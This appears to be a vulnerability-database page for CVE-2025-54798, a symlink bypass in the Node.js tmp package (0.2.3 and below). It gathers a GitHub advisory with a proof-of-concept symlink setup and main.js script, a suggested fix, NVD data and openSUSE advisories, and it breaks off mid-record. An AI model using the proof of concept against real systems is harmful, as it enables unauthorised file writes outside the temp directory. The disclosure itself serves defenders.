// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L590-L609
function _assertIsRelative(name, option, tmpDir) {
if (option === 'name') {
// assert that name is not absolute and does not contain a path
if (path.isAbsolute(name))
throw new Error(`${option} option must not contain an absolute path, found "${name}".`);
// must not fail on valid .<name> or ..<name> or similar such constructs
let basename = path.basename(name);
if (basename === '..' || basename === '.' || basename !== name)
throw new Error(`${option} option must not contain a path, found "${name}".`);
}
else { // if (option === 'dir' || option === 'template') {
// assert that dir or template are relative to tmpDir
if (path.isAbsolute(name) && !name.startsWith(tmpDir)) {
throw new Error(`${option} option must be relative to "${tmpDir}", found "${name}".`);
}
let resolvedPath = _resolvePath(name, tmpDir); //<---
if (!resolvedPath.startsWith(tmpDir))
throw new Error(`${option} option must be relative to "${tmpDir}", found "${resolvedPath}".`);
}
}
PoC
The following PoC demonstrates how writing a tmp file on a folder outside the tmpDir is possible.
Tested on a Linux machine.
- Setup: create a symbolic link inside the
tmpDirthat points to a directory outside of it ```bash mkdir $HOME/mydir1
ln -s $HOME/mydir1 ${TMPDIR:-/tmp}/evil-dir ```
-
check the folder is empty:
bash ls -lha $HOME/mydir1 | grep "tmp-" -
run the poc
bash node main.js File: /tmp/evil-dir/tmp-26821-Vw87SLRaBIlf test 1: ENOENT: no such file or directory, open '/tmp/mydir1/tmp-[random-id]' test 2: dir option must be relative to "/tmp", found "/foo". test 3: dir option must be relative to "/tmp", found "/home/user/mydir1". -
the temporary file is created under
$HOME/mydir1(outside thetmpDir):bash ls -lha $HOME/mydir1 | grep "tmp-" -rw------- 1 user user 0 Apr X XX:XX tmp-[random-id] -
main.js```js // npm i tmp@0.2.3
const tmp = require('tmp');
const tmpobj = tmp.fileSync({ 'dir': 'evil-dir'}); console.log('File: ', tmpobj.name);
try { tmp.fileSync({ 'dir': 'mydir1'}); } catch (err) { console.log('test 1:', err.message) }
try { tmp.fileSync({ 'dir': '/foo'}); } catch (err) { console.log('test 2:', err.message) }
try { const fs = require('node:fs'); const resolved = fs.realpathSync('/tmp/evil-dir'); tmp.fileSync({ 'dir': resolved}); } catch (err) { console.log('test 3:', err.message) } ```
A Potential fix could be to call fs.realpathSync (or similar) that resolves also symbolic links.
js
function _resolvePath(name, tmpDir) {
let resolvedPath;
if (name.startsWith(tmpDir)) {
resolvedPath = path.resolve(name);
} else {
resolvedPath = path.resolve(path.join(tmpDir, name));
}
return fs.realpathSync(resolvedPath);
}
Impact
Arbitrary temporary file / directory write via symlink
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.2.3"
},
"package": {
"ecosystem": "npm",
"name": "tmp"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.2.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-54798"
],
"database_specific": {
"cwe_ids": [
"CWE-59"
],
"github_reviewed": true,
"github_reviewed_at": "2025-08-06T17:06:04Z",
"nvd_published_at": "2025-08-07T01:15:26Z",
"severity": "LOW"
},
"details": "### Summary\n\n`tmp@0.2.3` is vulnerable to an Arbitrary temporary file / directory write via symbolic link `dir` parameter.\n\n\n### Details\n\nAccording to the documentation there are some conditions that must be held:\n\n```\n// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L41-L50\n\nOther breaking changes, i.e.\n\n- template must be relative to tmpdir\n- name must be relative to tmpdir\n- dir option must be relative to tmpdir //\u003c-- this assumption can be bypassed using symlinks\n\nare still in place.\n\nIn order to override the system\u0027s tmpdir, you will have to use the newly\nintroduced tmpdir option.\n\n\n// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L375\n* `dir`: the optional temporary directory that must be relative to the system\u0027s default temporary directory.\n absolute paths are fine as long as they point to a location under the system\u0027s default temporary directory.\n Any directories along the so specified path must exist, otherwise a ENOENT error will be thrown upon access, \n as tmp will not check the availability of the path, nor will it establish the requested path for you.\n```\n\nRelated issue: https://github.com/raszi/node-tmp/issues/207.\n\n\nThe issue occurs because `_resolvePath` does not properly handle symbolic link when resolving paths:\n```js\n// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L573-L579\nfunction _resolvePath(name, tmpDir) {\n if (name.startsWith(tmpDir)) {\n return path.resolve(name);\n } else {\n return path.resolve(path.join(tmpDir, name));\n }\n}\n```\n\nIf the `dir` parameter points to a symlink that resolves to a folder outside the `tmpDir`, it\u0027s possible to bypass the `_assertIsRelative` check used in `_assertAndSanitizeOptions`:\n```js\n// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L590-L609\nfunction _assertIsRelative(name, option, tmpDir) {\n if (option === \u0027name\u0027) {\n // assert that name is not absolute and does not contain a path\n if (path.isAbsolute(name))\n throw new Error(`${option} option must not contain an absolute path, found \"${name}\".`);\n // must not fail on valid .\u003cname\u003e or ..\u003cname\u003e or similar such constructs\n let basename = path.basename(name);\n if (basename === \u0027..\u0027 || basename === \u0027.\u0027 || basename !== name)\n throw new Error(`${option} option must not contain a path, found \"${name}\".`);\n }\n else { // if (option === \u0027dir\u0027 || option === \u0027template\u0027) {\n // assert that dir or template are relative to tmpDir\n if (path.isAbsolute(name) \u0026\u0026 !name.startsWith(tmpDir)) {\n throw new Error(`${option} option must be relative to \"${tmpDir}\", found \"${name}\".`);\n }\n let resolvedPath = _resolvePath(name, tmpDir); //\u003c--- \n if (!resolvedPath.startsWith(tmpDir))\n throw new Error(`${option} option must be relative to \"${tmpDir}\", found \"${resolvedPath}\".`);\n }\n}\n```\n\n\n### PoC\n\nThe following PoC demonstrates how writing a tmp file on a folder outside the `tmpDir` is possible.\nTested on a Linux machine.\n\n- Setup: create a symbolic link inside the `tmpDir` that points to a directory outside of it\n```bash\nmkdir $HOME/mydir1\n\nln -s $HOME/mydir1 ${TMPDIR:-/tmp}/evil-dir\n```\n\n- check the folder is empty:\n```bash\nls -lha $HOME/mydir1 | grep \"tmp-\"\n```\n\n- run the poc\n```bash\nnode main.js\nFile: /tmp/evil-dir/tmp-26821-Vw87SLRaBIlf\ntest 1: ENOENT: no such file or directory, open \u0027/tmp/mydir1/tmp-[random-id]\u0027\ntest 2: dir option must be relative to \"/tmp\", found \"/foo\".\ntest 3: dir option must be relative to \"/tmp\", found \"/home/user/mydir1\".\n```\n\n- the temporary file is created under `$HOME/mydir1` (outside the `tmpDir`):\n```bash\nls -lha $HOME/mydir1 | grep \"tmp-\"\n-rw------- 1 user user 0 Apr X XX:XX tmp-[random-id]\n```\n\n\n- `main.js`\n```js\n// npm i tmp@0.2.3\n\nconst tmp = require(\u0027tmp\u0027);\n\nconst tmpobj = tmp.fileSync({ \u0027dir\u0027: \u0027evil-dir\u0027});\nconsole.log(\u0027File: \u0027, tmpobj.name);\n\ntry {\n tmp.fileSync({ \u0027dir\u0027: \u0027mydir1\u0027});\n} catch (err) {\n console.log(\u0027test 1:\u0027, err.message)\n}\n\ntry {\n tmp.fileSync({ \u0027dir\u0027: \u0027/foo\u0027});\n} catch (err) {\n console.log(\u0027test 2:\u0027, err.message)\n}\n\ntry {\n const fs = require(\u0027node:fs\u0027);\n const resolved = fs.realpathSync(\u0027/tmp/evil-dir\u0027);\n tmp.fileSync({ \u0027dir\u0027: resolved});\n} catch (err) {\n console.log(\u0027test 3:\u0027, err.message)\n}\n```\n\n\nA Potential fix could be to call `fs.realpathSync` (or similar) that resolves also symbolic links.\n```js\nfunction _resolvePath(name, tmpDir) {\n let resolvedPath;\n if (name.startsWith(tmpDir)) {\n resolvedPath = path.resolve(name);\n } else {\n resolvedPath = path.resolve(path.join(tmpDir, name));\n }\n return fs.realpathSync(resolvedPath);\n}\n```\n\n\n### Impact\n\nArbitrary temporary file / directory write via symlink",
"id": "GHSA-52f5-9888-hmc6",
"modified": "2025-11-03T21:34:20Z",
"published": "2025-08-06T17:06:04Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/raszi/node-tmp/security/advisories/GHSA-52f5-9888-hmc6"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54798"
},
{
"type": "WEB",
"url": "https://github.com/raszi/node-tmp/issues/207"
},
{
"type": "WEB",
"url": "https://github.com/raszi/node-tmp/commit/188b25e529496e37adaf1a1d9dccb40019a08b1b"
},
{
"type": "PACKAGE",
"url": "https://github.com/raszi/node-tmp"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2025/08/msg00007.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "tmp allows arbitrary temporary file / directory write via symbolic link `dir` parameter"
}
fkie_cve-2025-54798
Vulnerability from fkie_nvd
Published
2025-08-07 01:15
Modified
2025-11-03 20:19
Severity ?
2.5 (Low) - CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N
5.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
5.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Summary
tmp is a temporary file and directory creator for node.js. In versions 0.2.3 and below, tmp is vulnerable to an arbitrary temporary file / directory write via symbolic link dir parameter. This is fixed in version 0.2.4.
References
| URL | Tags | ||
|---|---|---|---|
| security-advisories@github.com | https://github.com/raszi/node-tmp/commit/188b25e529496e37adaf1a1d9dccb40019a08b1b | Patch | |
| security-advisories@github.com | https://github.com/raszi/node-tmp/issues/207 | Issue Tracking, Patch | |
| security-advisories@github.com | https://github.com/raszi/node-tmp/security/advisories/GHSA-52f5-9888-hmc6 | Exploit, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.debian.org/debian-lts-announce/2025/08/msg00007.html | ||
| 134c704f-9b21-4f2e-91b3-4a467353bcc0 | https://github.com/raszi/node-tmp/security/advisories/GHSA-52f5-9888-hmc6 | Exploit, Vendor Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:raszi:tmp:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "463A9FBD-7DD2-46BD-96B9-0A107149FF94",
"versionEndExcluding": "0.2.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "tmp is a temporary file and directory creator for node.js. In versions 0.2.3 and below, tmp is vulnerable to an arbitrary temporary file / directory write via symbolic link dir parameter. This is fixed in version 0.2.4."
},
{
"lang": "es",
"value": "tmp es un creador de archivos y directorios temporales para Node.js. En las versiones 0.2.3 y anteriores, tmp es vulnerable a la escritura arbitraria de archivos o directorios temporales mediante el par\u00e1metro dir de enlace simb\u00f3lico. Esto se solucion\u00f3 en la versi\u00f3n 0.2.4."
}
],
"id": "CVE-2025-54798",
"lastModified": "2025-11-03T20:19:15.177",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 2.5,
"baseSeverity": "LOW",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.0,
"impactScore": 1.4,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2025-08-07T01:15:26.203",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/raszi/node-tmp/commit/188b25e529496e37adaf1a1d9dccb40019a08b1b"
},
{
"source": "security-advisories@github.com",
"tags": [
"Issue Tracking",
"Patch"
],
"url": "https://github.com/raszi/node-tmp/issues/207"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/raszi/node-tmp/security/advisories/GHSA-52f5-9888-hmc6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://lists.debian.org/debian-lts-announce/2025/08/msg00007.html"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/raszi/node-tmp/security/advisories/GHSA-52f5-9888-hmc6"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-59"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
opensuse-su-2025:15506-1
Vulnerability from csaf_opensuse
Published
2025-09-01 00:00
Modified
2025-09-01 00:00
Summary
jupyter-bqplot-jupyterlab-0.5.46-13.1 on GA media
Notes
Title of the patch
jupyter-bqplot-jupyterlab-0.5.46-13.1 on GA media
Description of the patch
These are all security issues fixed in the jupyter-bqplot-jupyterlab-0.5.46-13.1 package on the GA media of openSUSE Tumbleweed.
Patchnames
openSUSE-Tumbleweed-2025-15506
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "jupyter-bqplot-jupyterlab-0.5.46-13.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the jupyter-bqplot-jupyterlab-0.5.46-13.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2025-15506",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2025_15506-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-54798 page",
"url": "https://www.suse.com/security/cve/CVE-2025-54798/"
}
],
"title": "jupyter-bqplot-jupyterlab-0.5.46-13.1 on GA media",
"tracking": {
"current_release_date": "2025-09-01T00:00:00Z",
"generator": {
"date": "2025-09-01T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2025:15506-1",
"initial_release_date": "2025-09-01T00:00:00Z",
"revision_history": [
{
"date": "2025-09-01T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "jupyter-bqplot-jupyterlab-0.5.46-13.1.aarch64",
"product": {
"name": "jupyter-bqplot-jupyterlab-0.5.46-13.1.aarch64",
"product_id": "jupyter-bqplot-jupyterlab-0.5.46-13.1.aarch64"
}
},
{
"category": "product_version",
"name": "jupyter-bqplot-notebook-0.5.46-13.1.aarch64",
"product": {
"name": "jupyter-bqplot-notebook-0.5.46-13.1.aarch64",
"product_id": "jupyter-bqplot-notebook-0.5.46-13.1.aarch64"
}
},
{
"category": "product_version",
"name": "python311-bqplot-0.12.45-13.1.aarch64",
"product": {
"name": "python311-bqplot-0.12.45-13.1.aarch64",
"product_id": "python311-bqplot-0.12.45-13.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "jupyter-bqplot-jupyterlab-0.5.46-13.1.ppc64le",
"product": {
"name": "jupyter-bqplot-jupyterlab-0.5.46-13.1.ppc64le",
"product_id": "jupyter-bqplot-jupyterlab-0.5.46-13.1.ppc64le"
}
},
{
"category": "product_version",
"name": "jupyter-bqplot-notebook-0.5.46-13.1.ppc64le",
"product": {
"name": "jupyter-bqplot-notebook-0.5.46-13.1.ppc64le",
"product_id": "jupyter-bqplot-notebook-0.5.46-13.1.ppc64le"
}
},
{
"category": "product_version",
"name": "python311-bqplot-0.12.45-13.1.ppc64le",
"product": {
"name": "python311-bqplot-0.12.45-13.1.ppc64le",
"product_id": "python311-bqplot-0.12.45-13.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "jupyter-bqplot-jupyterlab-0.5.46-13.1.s390x",
"product": {
"name": "jupyter-bqplot-jupyterlab-0.5.46-13.1.s390x",
"product_id": "jupyter-bqplot-jupyterlab-0.5.46-13.1.s390x"
}
},
{
"category": "product_version",
"name": "jupyter-bqplot-notebook-0.5.46-13.1.s390x",
"product": {
"name": "jupyter-bqplot-notebook-0.5.46-13.1.s390x",
"product_id": "jupyter-bqplot-notebook-0.5.46-13.1.s390x"
}
},
{
"category": "product_version",
"name": "python311-bqplot-0.12.45-13.1.s390x",
"product": {
"name": "python311-bqplot-0.12.45-13.1.s390x",
"product_id": "python311-bqplot-0.12.45-13.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "jupyter-bqplot-jupyterlab-0.5.46-13.1.x86_64",
"product": {
"name": "jupyter-bqplot-jupyterlab-0.5.46-13.1.x86_64",
"product_id": "jupyter-bqplot-jupyterlab-0.5.46-13.1.x86_64"
}
},
{
"category": "product_version",
"name": "jupyter-bqplot-notebook-0.5.46-13.1.x86_64",
"product": {
"name": "jupyter-bqplot-notebook-0.5.46-13.1.x86_64",
"product_id": "jupyter-bqplot-notebook-0.5.46-13.1.x86_64"
}
},
{
"category": "product_version",
"name": "python311-bqplot-0.12.45-13.1.x86_64",
"product": {
"name": "python311-bqplot-0.12.45-13.1.x86_64",
"product_id": "python311-bqplot-0.12.45-13.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-bqplot-jupyterlab-0.5.46-13.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-13.1.aarch64"
},
"product_reference": "jupyter-bqplot-jupyterlab-0.5.46-13.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-bqplot-jupyterlab-0.5.46-13.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-13.1.ppc64le"
},
"product_reference": "jupyter-bqplot-jupyterlab-0.5.46-13.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-bqplot-jupyterlab-0.5.46-13.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-13.1.s390x"
},
"product_reference": "jupyter-bqplot-jupyterlab-0.5.46-13.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-bqplot-jupyterlab-0.5.46-13.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-13.1.x86_64"
},
"product_reference": "jupyter-bqplot-jupyterlab-0.5.46-13.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-bqplot-notebook-0.5.46-13.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-13.1.aarch64"
},
"product_reference": "jupyter-bqplot-notebook-0.5.46-13.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-bqplot-notebook-0.5.46-13.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-13.1.ppc64le"
},
"product_reference": "jupyter-bqplot-notebook-0.5.46-13.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-bqplot-notebook-0.5.46-13.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-13.1.s390x"
},
"product_reference": "jupyter-bqplot-notebook-0.5.46-13.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jupyter-bqplot-notebook-0.5.46-13.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-13.1.x86_64"
},
"product_reference": "jupyter-bqplot-notebook-0.5.46-13.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-bqplot-0.12.45-13.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-bqplot-0.12.45-13.1.aarch64"
},
"product_reference": "python311-bqplot-0.12.45-13.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-bqplot-0.12.45-13.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-bqplot-0.12.45-13.1.ppc64le"
},
"product_reference": "python311-bqplot-0.12.45-13.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-bqplot-0.12.45-13.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-bqplot-0.12.45-13.1.s390x"
},
"product_reference": "python311-bqplot-0.12.45-13.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python311-bqplot-0.12.45-13.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:python311-bqplot-0.12.45-13.1.x86_64"
},
"product_reference": "python311-bqplot-0.12.45-13.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-54798",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-54798"
}
],
"notes": [
{
"category": "general",
"text": "tmp is a temporary file and directory creator for node.js. In versions 0.2.3 and below, tmp is vulnerable to an arbitrary temporary file / directory write via symbolic link dir parameter. This is fixed in version 0.2.4.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-13.1.aarch64",
"openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-13.1.ppc64le",
"openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-13.1.s390x",
"openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-13.1.x86_64",
"openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-13.1.aarch64",
"openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-13.1.ppc64le",
"openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-13.1.s390x",
"openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-13.1.x86_64",
"openSUSE Tumbleweed:python311-bqplot-0.12.45-13.1.aarch64",
"openSUSE Tumbleweed:python311-bqplot-0.12.45-13.1.ppc64le",
"openSUSE Tumbleweed:python311-bqplot-0.12.45-13.1.s390x",
"openSUSE Tumbleweed:python311-bqplot-0.12.45-13.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-54798",
"url": "https://www.suse.com/security/cve/CVE-2025-54798"
},
{
"category": "external",
"summary": "SUSE Bug 1247787 for CVE-2025-54798",
"url": "https://bugzilla.suse.com/1247787"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-13.1.aarch64",
"openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-13.1.ppc64le",
"openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-13.1.s390x",
"openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-13.1.x86_64",
"openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-13.1.aarch64",
"openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-13.1.ppc64le",
"openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-13.1.s390x",
"openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-13.1.x86_64",
"openSUSE Tumbleweed:python311-bqplot-0.12.45-13.1.aarch64",
"openSUSE Tumbleweed:python311-bqplot-0.12.45-13.1.ppc64le",
"openSUSE Tumbleweed:python311-bqplot-0.12.45-13.1.s390x",
"openSUSE Tumbleweed:python311-bqplot-0.12.45-13.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 2.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-13.1.aarch64",
"openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-13.1.ppc64le",
"openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-13.1.s390x",
"openSUSE Tumbleweed:jupyter-bqplot-jupyterlab-0.5.46-13.1.x86_64",
"openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-13.1.aarch64",
"openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-13.1.ppc64le",
"openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-13.1.s390x",
"openSUSE Tumbleweed:jupyter-bqplot-notebook-0.5.46-13.1.x86_64",
"openSUSE Tumbleweed:python311-bqplot-0.12.45-13.1.aarch64",
"openSUSE Tumbleweed:python311-bqplot-0.12.45-13.1.ppc64le",
"openSUSE Tumbleweed:python311-bqplot-0.12.45-13.1.s390x",
"openSUSE Tumbleweed:python311-bqplot-0.12.45-13.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-01T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-54798"
}
]
}
opensuse-su-2025:15502-1
Vulnerability from csaf_opensuse
Published
2025-08-29 00:00
Modified
2025-08-29 00:00
Summary
jupyter-nbdime-7.0.2-23.1 on GA media
Notes
Title of the patch
jupyter-nbdime-7.0.2-23.1 on GA media
Description of the patch
These are all security issues fixed in the jupyter-nbdime-7.0.2-23.1 package on the GA media of openSUSE Tumbleweed.
Patchnames
openSUSE-Tumbleweed-2025-15502
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "jupyter-nbdime-7.0.2-23.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the jupyter-nbdime-7.0.2-23.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2025-15502",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2025_15502-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-54798 page",
